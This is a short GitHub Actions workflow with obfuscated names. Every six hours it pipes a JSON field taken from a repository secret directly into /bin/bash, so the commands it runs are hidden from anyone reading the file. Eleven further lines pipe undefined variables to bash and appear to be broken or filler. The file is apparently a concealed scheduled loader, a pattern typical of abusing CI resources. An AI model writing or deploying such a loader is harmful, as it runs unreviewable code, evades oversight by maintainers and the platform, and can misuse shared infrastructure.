name: yuchangkan3910
on:
  workflow_dispatch:
  schedule:
    - cron: '56 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuchangkan3910
        env:
          r568: ${{ secrets.r568 }}
        run: |
          echo $r568 | jq -r .jsnv085 | /bin/bash
          echo $l79306 | jq -r .y1 | /bin/bash
          echo $li5 | jq -r .zca0 | /bin/bash
          echo $xaoko14 | jq -r .ukp6 | /bin/bash
          echo $g97 | jq -r .aeuw4786 | /bin/bash
          echo $id29780 | jq -r .as703 | /bin/bash
          echo $x34 | jq -r .tmco2 | /bin/bash
          echo $v0521 | jq -r .df928 | /bin/bash
          echo $moy9044 | jq -r .elj4913 | /bin/bash
          echo $exr2 | jq -r .db3838 | /bin/bash
          echo $cgqw058 | jq -r .s5 | /bin/bash
          echo $mxz31354 | jq -r .lg4 | /bin/bash

